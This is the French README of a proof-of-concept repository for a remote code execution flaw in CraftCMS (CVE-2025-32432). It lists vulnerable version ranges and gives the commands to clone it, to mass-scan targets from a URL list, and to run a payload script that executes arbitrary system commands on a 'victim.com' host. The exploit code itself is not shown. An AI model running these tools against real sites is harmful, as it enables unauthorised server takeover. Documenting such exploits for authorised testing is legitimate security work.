
CraftCMS CVE-2025-32432 - PoC propre
Version nettoyée et améliorée du Proof of Concept original.
Ce projet est sous licence MIT.
Voir le fichier LICENSE pour plus de détails.
Ce PoC est fourni uniquement à des fins éducatives et de tests autorisés (CTF, audits de sécurité avec permission écrite explicite).
Toute utilisation sur des systèmes sans autorisation est illégale. L’auteur décline toute responsabilité en cas de mauvaise utilisation.
< 3.9.15< 4.14.15< 5.6.17craftcms-cve-2025-32432-poc/
├── craftcms_rce_php_check.py
├── craftcms_final_payload.py
├── requirements.txt
├── README.md
├── LICENSE
└── .gitignore
git clone https://github.com/n40y/craftcms-cve-2025-32432-poc.git
cd craftcms-cve-2025-32432-poc
pip3 install -r requirements.txt
python3 craftcms_rce_php_check.py -u https://target.com
# Ou avec une liste
python3 craftcms_rce_php_check.py -f urls.txt -t 10
python3 craftcms_final_payload.py -u https://victim.com -c "id"
-u, --url → URL cible (obligatoire)
-c, --cmd → Commande système à exécuter (obligatoire)
-a, --asset → AssetId valide connu (optionnel)
-s, --scan-max → Max assetId à scanner (défaut: 300)